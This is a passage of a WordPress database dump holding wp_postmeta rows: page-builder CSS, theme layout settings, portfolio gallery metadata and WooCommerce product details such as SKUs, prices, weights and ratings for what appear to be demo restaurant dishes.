!important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1533812953034{margin-top: -123px !important;}.vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(58441,4598,'_wpb_vc_js_status','true'),(58440,4598,'rs_page_bg_color','#ffffff'),(58439,4598,'slide_template','default'),(58438,4598,'_wp_page_template','full-width.php'),(58437,4598,'_edit_last','71'),(47367,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47368,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47369,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47370,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47371,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47372,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47373,2931,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52147,4359,'_menu_item_xfn',''),(47375,2931,'mkdf_page_content_behind_header_meta','no'),(47376,2931,'mkdf_page_content_padding','115px 0 100px 0'),(47377,2931,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47378,2931,'portfolio_single_back_to_link','1008'),(47379,2931,'mkdf_disable_vertical_header_background_image_meta','no'),(47380,2931,'mkdf_disable_header_widget_areas_meta','no'),(47381,2931,'slide_template','default'),(47382,2931,'_wpb_vc_js_status','true'),(47383,2931,'mkdf-portfolio-image-gallery','567,566,565'),(47384,2931,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47385,2931,'mkdf_portfolio_single_template_meta','small-images'),(47386,2931,'_wp_old_slug','h1-2-2'),(47387,2931,'_wp_old_slug','h2-1'),(47388,2931,'_wp_old_slug','h7-6'),(47389,2931,'_dp_original','2344'),(47390,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47391,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47392,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47393,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47394,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47395,2932,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52241,4369,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47397,2932,'mkdf_page_content_behind_header_meta','no'),(47398,2932,'mkdf_page_content_padding','115px 0 100px 0'),(47399,2932,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47400,2932,'portfolio_single_back_to_link','1008'),(47401,2932,'mkdf_disable_vertical_header_background_image_meta','no'),(47402,2932,'mkdf_disable_header_widget_areas_meta','no'),(47403,2932,'slide_template','default'),(47404,2932,'_wpb_vc_js_status','true'),(47405,2932,'mkdf-portfolio-image-gallery','567,566,565'),(47406,2932,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47407,2932,'mkdf_portfolio_single_template_meta','small-images'),(47408,2932,'_wp_old_slug','h1-2-2'),(47409,2932,'_wp_old_slug','h2-1'),(47410,2932,'_wp_old_slug','h7-6'),(47411,2932,'_dp_original','1048'),(47412,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47413,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47414,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47415,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47416,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47417,2933,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47418,2933,'mkdf_page_content_behind_header_meta','no'),(47419,2933,'mkdf_page_content_padding','115px 0 100px 0'),(47420,2933,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47421,2933,'portfolio_single_back_to_link','1008'),(47422,2933,'mkdf_disable_vertical_header_background_image_meta','no'),(47423,2933,'mkdf_disable_header_widget_areas_meta','no'),(47424,2933,'slide_template','default'),(47425,2933,'_wpb_vc_js_status','true'),(47426,2933,'mkdf-portfolio-image-gallery','567,566,565'),(47427,2933,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47428,2933,'mkdf_portfolio_single_template_meta','slider'),(47429,2933,'_thumbnail_id','1030'),(47430,2933,'_wp_old_slug','h7-5'),(47431,2933,'_dp_original','1047'),(47432,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47433,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47434,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47435,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47436,2934,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47438,2934,'mkdf_page_content_behind_header_meta','no'),(47439,2934,'mkdf_page_content_padding','115px 0 100px 0'),(47440,2934,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47441,2934,'portfolio_single_back_to_link','1008'),(47442,2934,'mkdf_disable_vertical_header_background_image_meta','no'),(47443,2934,'mkdf_disable_header_widget_areas_meta','no'),(47444,2934,'slide_template','default'),(47445,2934,'_wpb_vc_js_status','true'),(47446,2934,'mkdf-portfolio-image-gallery','567,566,565'),(47447,2934,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47448,2934,'mkdf_portfolio_single_template_meta','small-images'),(47449,2934,'_wp_old_slug','h1-2-2'),(47450,2934,'_wp_old_slug','h2-1'),(47451,2934,'_wp_old_slug','h7-4'),(47452,2934,'_dp_original','1019'),(47453,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47454,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47455,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47456,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47457,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47458,2935,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47459,2935,'mkdf_page_content_behind_header_meta','no'),(47460,2935,'mkdf_page_content_padding','115px 0 100px 0'),(47461,2935,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47462,2935,'portfolio_single_back_to_link','1008'),(47463,2935,'mkdf_disable_vertical_header_background_image_meta','no'),(47464,2935,'mkdf_disable_header_widget_areas_meta','no'),(47465,2935,'slide_template','default'),(47466,2935,'_wpb_vc_js_status','true'),(47467,2935,'mkdf-portfolio-image-gallery','567,566,565'),(47468,2935,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47469,2935,'mkdf_portfolio_single_template_meta','gallery'),(47471,2935,'_wp_old_slug','h7-1'),(47472,2935,'_dp_original','1022'),(47473,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47474,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47475,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47476,2936,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47477,2936,'mkdf_page_content_behind_header_meta','no'),(47478,2936,'mkdf_page_content_padding','115px 0 100px 0'),(47479,2936,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47480,2936,'portfolio_single_back_to_link','610'),(47481,2936,'mkdf_disable_vertical_header_background_image_meta','no'),(47482,2936,'mkdf_disable_header_widget_areas_meta','no'),(47483,2936,'slide_template','default'),(47484,2936,'_wpb_vc_js_status','false'),(47485,2936,'mkdf-portfolio-image-gallery','565,566,567'),(47486,2936,'mkdf_portfolio_single_template_meta','images'),(47487,2936,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47488,2936,'_thumbnail_id','1103'),(47489,2936,'_wp_old_slug','h6-9'),(47490,2936,'_dp_original','660'),(47491,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47492,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47493,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47494,2937,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47495,2937,'mkdf_page_content_behind_header_meta','no'),(47496,2937,'mkdf_page_content_padding','115px 0 100px 0'),(47497,2937,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47498,2937,'portfolio_single_back_to_link','610'),(47499,2937,'mkdf_disable_vertical_header_background_image_meta','no'),(47500,2937,'mkdf_disable_header_widget_areas_meta','no'),(47501,2937,'slide_template','default'),(47502,2937,'_wpb_vc_js_status','false'),(47503,2937,'mkdf-portfolio-image-gallery','565,566,567'),(47504,2937,'mkdf_portfolio_single_template_meta','images'),(47505,2937,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47506,2937,'_thumbnail_id','1103'),(47507,2937,'_wp_old_slug','h6-9'),(47508,2937,'_dp_original','660'),(47509,2937,'_wp_old_slug','ice-dream-3__trashed'),(47510,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47511,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47512,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47513,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47514,2938,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47515,2938,'mkdf_page_content_behind_header_meta','no'),(47516,2938,'mkdf_page_content_padding','115px 0 100px 0'),(47517,2938,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47518,2938,'portfolio_single_back_to_link','610'),(47519,2938,'mkdf_disable_vertical_header_background_image_meta','no'),(47520,2938,'mkdf_disable_header_widget_areas_meta','no'),(47521,2938,'slide_template','default'),(47522,2938,'_wpb_vc_js_status','true'),(47523,2938,'mkdf-portfolio-image-gallery','567,566,565'),(47524,2938,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47525,2938,'mkdf_portfolio_single_template_meta','small-images'),(47526,2938,'_thumbnail_id','1102'),(47527,2938,'_wp_old_slug','h6-8'),(47528,2938,'_dp_original','659'),(47529,2939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47530,2939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47531,2939,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47532,2939,'mkdf_page_content_behind_header_meta','no'),(47533,2939,'mkdf_page_content_padding','115px 0 100px 0'),(47534,2939,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47535,2939,'portfolio_single_back_to_link','610'),(47536,2939,'mkdf_disable_vertical_header_background_image_meta','no'),(47537,2939,'mkdf_disable_header_widget_areas_meta','no'),(47538,2939,'slide_template','default'),(47539,2939,'_wpb_vc_js_status','false'),(47540,2939,'mkdf-portfolio-image-gallery','565,566,567'),(47541,2939,'mkdf_portfolio_single_template_meta','images'),(47542,2939,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47543,2939,'_thumbnail_id','1101'),(47544,2939,'_wp_old_slug','h6-7'),(47545,2939,'_dp_original','648'),(47546,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47547,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47548,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47549,2940,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47550,2940,'mkdf_page_content_behind_header_meta','no'),(47551,2940,'mkdf_page_content_padding','115px 0 100px 0'),(47552,2940,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47553,2940,'portfolio_single_back_to_link','610'),(47554,2940,'mkdf_disable_vertical_header_background_image_meta','no'),(47555,2940,'mkdf_disable_header_widget_areas_meta','no'),(47556,2940,'slide_template','default'),(47557,2940,'_wpb_vc_js_status','true'),(47558,2940,'mkdf-portfolio-image-gallery','567,566,565'),(47559,2940,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47560,2940,'mkdf_portfolio_single_template_meta','small-images'),(47561,2940,'_thumbnail_id','1121'),(47562,2940,'_wp_old_slug','h6-6'),(47563,2940,'_dp_original','649'),(47564,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47565,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47566,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47567,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47568,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47569,2941,'mkdf_page_content_behind_header_meta','no'),(47570,2941,'mkdf_page_content_padding','115px 0 100px 0'),(47571,2941,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47572,2941,'portfolio_single_back_to_link','610'),(47573,2941,'mkdf_disable_vertical_header_background_image_meta','no'),(47574,2941,'mkdf_disable_header_widget_areas_meta','no'),(47575,2941,'slide_template','default'),(47576,2941,'_wpb_vc_js_status','true'),(47577,2941,'mkdf-portfolio-image-gallery','567,566,565'),(47578,2941,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47579,2941,'mkdf_portfolio_single_template_meta','gallery'),(47580,2941,'_thumbnail_id','1099'),(47581,2941,'_wp_old_slug','h6-5'),(47582,2941,'_dp_original','645'),(47583,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47584,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47585,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47586,2942,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47587,2942,'mkdf_page_content_behind_header_meta','no'),(47588,2942,'mkdf_page_content_padding','115px 0 100px 0'),(47589,2942,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47590,2942,'portfolio_single_back_to_link','610'),(47591,2942,'mkdf_disable_vertical_header_background_image_meta','no'),(47592,2942,'mkdf_disable_header_widget_areas_meta','no'),(47593,2942,'slide_template','default'),(47594,2942,'_wpb_vc_js_status','true'),(47595,2942,'mkdf-portfolio-image-gallery','565,566,567'),(47596,2942,'mkdf_portfolio_single_template_meta','small-slider'),(47597,2942,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47598,2942,'_thumbnail_id','1097'),(47599,2942,'_wp_old_slug','h6-4'),(47600,2942,'_wp_old_slug','cream-soup'),(47601,2942,'_dp_original','644'),(47602,3770,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47603,3770,'slide_template','default'),(47604,3770,'mkdf_page_content_behind_header_meta','no'),(47605,3770,'mkdf_video_type_meta','social_networks'),(47606,3770,'mkdf_audio_type_meta','social_networks'),(47607,3770,'mkdf_disable_vertical_header_background_image_meta','no'),(47608,3770,'mkdf_disable_header_widget_areas_meta','no'),(47609,3770,'mkdf_show_title_area_meta','yes'),(47610,3770,'mkdf_title_area_type_meta','attika'),(47611,3770,'_mkdf-like','0'),(47612,3770,'_thumbnail_id','8'),(47613,3770,'_wpb_vc_js_status','true'),(47614,3770,'mkdf_page_content_padding','120px 0 0'),(47615,3770,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47616,3770,'_wp_old_date','2018-07-27'),(47617,3106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47618,3106,'_wc_review_count','1'),(47619,3106,'_wc_rating_count','a:1:{i:4;i:1;}'),(47620,3106,'_wc_average_rating','4.00'),(47621,3106,'_thumbnail_id','38'),(47622,3106,'mkdf_show_new_sign_woo_meta','no'),(47623,3106,'_sku','PR0014'),(47624,3106,'_regular_price','48'),(47625,3106,'_sale_price',''),(47626,3106,'_sale_price_dates_from',''),(47627,3106,'_sale_price_dates_to',''),(47628,3106,'total_sales','0'),(47629,3106,'_tax_status','taxable'),(47630,3106,'_tax_class',''),(47631,3106,'_manage_stock','no'),(47632,3106,'_backorders','no'),(47633,3106,'_sold_individually','no'),(47634,3106,'_weight','310'),(47635,3106,'_length',''),(47636,3106,'_width',''),(47637,3106,'_height',''),(47638,3106,'_upsell_ids','a:0:{}'),(47639,3106,'_crosssell_ids','a:0:{}'),(47640,3106,'_purchase_note',''),(47641,3106,'_default_attributes','a:0:{}'),(47642,3106,'_virtual','no'),(47643,3106,'_downloadable','no'),(47644,3106,'_product_image_gallery',''),(47645,3106,'_download_limit','-1'),(47646,3106,'_download_expiry','-1'),(47647,3106,'_stock',''),(47648,3106,'_stock_status','instock'),(47649,3106,'_product_version','3.4.3'),(47650,3106,'_price','48'),(47651,3106,'slide_template','default'),(47652,3106,'_wpb_vc_js_status','false'),(47653,3106,'_wp_old_slug','crispy-sesame-cake'),(47654,3106,'_wp_old_slug','charleston-shrimp-grits'),(47655,3106,'_wp_old_slug','garnished-charleston-shrimp'),(47656,3106,'_wp_old_slug','garnished-magnolias-shrimp'),(47657,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47658,98,'_sku','PR0015'),(47659,98,'_regular_price','67'),(47660,98,'_sale_price',''),(47661,98,'_sale_price_dates_from',''),(47662,98,'_sale_price_dates_to',''),(47663,98,'total_sales','0'),(47664,98,'_tax_status','taxable'),(47665,98,'_tax_class',''),(47666,98,'_manage_stock','no'),(47667,98,'_backorders','no'),(47668,98,'_sold_individually','no'),(47669,98,'_weight','400'),(47670,98,'_length',''),(47671,98,'_width',''),(47672,98,'_height',''),(47673,98,'_upsell_ids','a:0:{}'),(47674,98,'_crosssell_ids','a:0:{}'),(47675,98,'_purchase_note',''),(47676,98,'_default_attributes','a:0:{}'),(47677,98,'_virtual','no'),(47678,98,'_downloadable','no'),(47679,98,'_product_image_gallery',''),(47680,98,'_download_limit','-1'),(47681,98,'_download_expiry','-1'),(47683,98,'_stock',''),(47684,98,'_stock_status','instock'),(47685,98,'_wc_average_rating','3.50'),(47686,98,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(47687,98,'_wc_review_count','2'),(47688,98,'_downloadable_files','a:0:{}'),(47689,98,'_product_attributes','a:0:{}'),(47690,98,'_product_version','3.4.3'),(47691,98,'_price','67'),(47692,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47693,98,'mkdf_show_new_sign_woo_meta','no'),(47694,98,'slide_template','default'),(47695,98,'_wpb_vc_js_status','false'),(47696,98,'_wp_old_slug','tuna-with-crispy-artichoke'),(47697,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47698,3107,'_sku','PR0016'),(47699,3107,'_regular_price','73'),(47700,3107,'_sale_price',''),(47701,3107,'_sale_price_dates_from',''),(47702,3107,'_sale_price_dates_to',''),(47703,3107,'total_sales','0'),(47704,3107,'_tax_status','taxable'),(47705,3107,'_tax_class',''),(47706,3107,'_manage_stock','no'),(47707,3107,'_backorders','no'),(47708,3107,'_sold_individually','no'),(47709,3107,'_weight','250'),(47710,3107,'_length',''),(47711,3107,'_width',''),(47712,3107,'_height',''),(47713,3107,'_upsell_ids','a:0:{}'),(47714,3107,'_crosssell_ids','a:0:{}'),(47715,3107,'_purchase_note',''),(47716,3107,'_default_attributes','a:0:{}'),(47717,3107,'_virtual','no'),(47718,3107,'_downloadable','no'),(47719,3107,'_product_image_gallery',''),(47720,3107,'_download_limit','-1'),(47721,3107,'_download_expiry','-1'),(47722,3107,'_thumbnail_id','40'),(47723,3107,'_stock',''),(47724,3107,'_stock_status','instock'),(47725,3107,'_wc_average_rating','5.00'),(47726,3107,'_wc_rating_count','a:1:{i:5;i:1;}'),(47727,3107,'_wc_review_count','1'),(47728,3107,'_downloadable_files','a:0:{}'),(47729,3107,'_product_attributes','a:0:{}'),(47730,3107,'_product_version','3.4.3'),(47731,3107,'_price','73'),(47732,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47733,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47734,3107,'mkdf_show_new_sign_woo_meta','no'),(47735,3107,'slide_template','default'),(47736,3107,'_wpb_vc_js_status','false'),(47737,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47738,3108,'_sku','PR0017'),(47739,3108,'_regular_price','58'),(47740,3108,'_sale_price',''),(47741,3108,'_sale_price_dates_from',''),(47742,3108,'_sale_price_dates_to',''),(47743,3108,'total_sales','0'),(47744,3108,'_tax_status','taxable'),(47745,3108,'_tax_class',''),(47746,3108,'_manage_stock','no'),(47747,3108,'_backorders','no'),(47748,3108,'_sold_individually','no'),(47749,3108,'_weight','315'),(47750,3108,'_length',''),(47751,3108,'_width',''),(47752,3108,'_height',''),(47753,3108,'_upsell_ids','a:0:{}'),(47754,3108,'_crosssell_ids','a:0:{}'),(47755,3108,'_purchase_note',''),(47756,3108,'_default_attributes','a:0:{}'),(47757,3108,'_virtual','no'),(47758,3108,'_downloadable','no'),(47759,3108,'_product_image_gallery',''),(47760,3108,'_download_limit','-1'),(47761,3108,'_download_expiry','-1'),(47762,3108,'_thumbnail_id','41'),(47763,3108,'_stock',''),(47764,3108,'_stock_status','outofstock'),(47765,3108,'_wc_average_rating','3.00'),(47766,3108,'_wc_rating_count','a:1:{i:3;i:1;}'),(47767,3108,'_wc_review_count','1'),(47768,3108,'_downloadable_files','a:0:{}'),(47769,3108,'_product_attributes','a:0:{}'),(47770,3108,'_product_version','3.4.3'),(47771,3108,'_price','58'),(47772,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47773,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47774,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47775,3108,'mkdf_show_new_sign_woo_meta','no'),(47776,3108,'slide_template','default'),(47777,3108,'_wpb_vc_js_status','false'),(47778,3108,'_wp_old_slug','gadabout-with-salad'),(47779,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47780,3109,'_sku','PR0018'),(47781,3109,'_regular_price','80'),(47782,3109,'_sale_price','72'),(47783,3109,'_sale_price_dates_from',''),(47784,3109,'_sale_price_dates_to',''),(47785,3109,'total_sales','0'),(47786,3109,'_tax_status','taxable'),(47787,3109,'_tax_class',''),(47788,3109,'_manage_stock','no'),(47789,3109,'_backorders','no'),(47790,3109,'_sold_individually','no'),(47791,3109,'_weight','215'),(47792,3109,'_length',''),(47793,3109,'_width',''),(47794,3109,'_height',''),(47795,3109,'_upsell_ids','a:0:{}'),(47796,3109,'_crosssell_ids','a:0:{}'),(47797,3109,'_purchase_note',''),(47798,3109,'_default_attributes','a:0:{}'),(47799,3109,'_virtual','no'),(47800,3109,'_downloadable','no'),(47801,3109,'_product_image_gallery',''),(47802,3109,'_download_limit','-1'),(47803,3109,'_download_expiry','-1'),(47805,3109,'_stock',''),(47806,3109,'_stock_status','instock'),(47807,3109,'_wc_average_rating','5.00'),(47808,3109,'_wc_rating_count','a:1:{i:5;i:1;}'),(47809,3109,'_wc_review_count','1'),(47810,3109,'_downloadable_files','a:0:{}'),(47811,3109,'_product_attributes','a:0:{}'),(47812,3109,'_product_version','3.4.3'),(47813,3109,'_price','72'),(47814,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47815,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47816,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47817,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47818,3109,'mkdf_show_new_sign_woo_meta','no'),(47819,3109,'slide_template','default'),(47820,3109,'_wpb_vc_js_status','false'),(47821,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47822,3110,'_sku','PR0019'),(47823,3110,'_regular_price','67'),(47824,3110,'_sale_price',''),(47825,3110,'_sale_price_dates_from',''),(47826,3110,'_sale_price_dates_to',''),(47827,3110,'total_sales','0'),(47828,3110,'_tax_status','taxable'),(47829,3110,'_tax_class',''),(47830,3110,'_manage_stock','no'),(47831,3110,'_backorders','no'),(47832,3110,'_sold_individually','no'),(47833,3110,'_weight','150'),(47834,3110,'_length',''),(47835,3110,'_width',''),(47836,3110,'_height',''),(47837,3110,'_upsell_ids','a:0:{}'),(47838,3110,'_crosssell_ids','a:0:{}'),(47839,3110,'_purchase_note',''),(47840,3110,'_default_attributes','a:0:{}'),(47841,3110,'_virtual','no'),(47842,3110,'_downloadable','no'),(47843,3110,'_product_image_gallery',''),(47844,3110,'_download_limit','-1'),(47845,3110,'_download_expiry','-1'),(47846,3110,'_thumbnail_id','43'),(47847,3110,'_stock',''),(47848,3110,'_stock_status','instock'),(47849,3110,'_wc_average_rating','4.00'),(47850,3110,'_wc_rating_count','a:1:{i:4;i:1;}'),(47851,3110,'_wc_review_count','1'),(47852,3110,'_downloadable_files','a:0:{}'),(47853,3110,'_product_attributes','a:0:{}'),(47854,3110,'_product_version','3.4.3'),(47855,3110,'_price','67'),(47856,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47857,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47858,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47859,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47860,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47861,3110,'mkdf_show_new_sign_woo_meta','no'),(47862,3110,'slide_template','default'),(47863,3110,'_wpb_vc_js_status','false'),(47864,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47865,3111,'_sku','PR0020'),(47866,3111,'_regular_price','67'),(47867,3111,'_sale_price',''),(47868,3111,'_sale_price_dates_from',''),(47869,3111,'_sale_price_dates_to',''),(47870,3111,'total_sales','0'),(47871,3111,'_tax_status','taxable'),(47872,3111,'_tax_class',''),(47873,3111,'_manage_stock','no'),(47874,3111,'_backorders','no'),(47875,3111,'_sold_individually','no'),(47876,3111,'_weight','150'),(47877,3111,'_length',''),(47878,3111,'_width',''),(47879,3111,'_height',''),(47880,3111,'_upsell_ids','a:0:{}'),(47881,3111,'_crosssell_ids','a:0:{}'),(47882,3111,'_purchase_note',''),(47883,3111,'_default_attributes','a:0:{}'),(47884,3111,'_virtual','no'),(47885,3111,'_downloadable','no'),(47886,3111,'_product_image_gallery',''),(47887,3111,'_download_limit','-1'),(47888,3111,'_download_expiry','-1'),(47890,3111,'_stock',''),(47891,3111,'_stock_status','instock'),(47892,3111,'_wc_average_rating','4.00'),(47893,3111,'_wc_rating_count','a:1:{i:4;i:1;}'),(47894,3111,'_wc_review_count','1'),(47895,3111,'_downloadable_files','a:0:{}'),(47896,3111,'_product_attributes','a: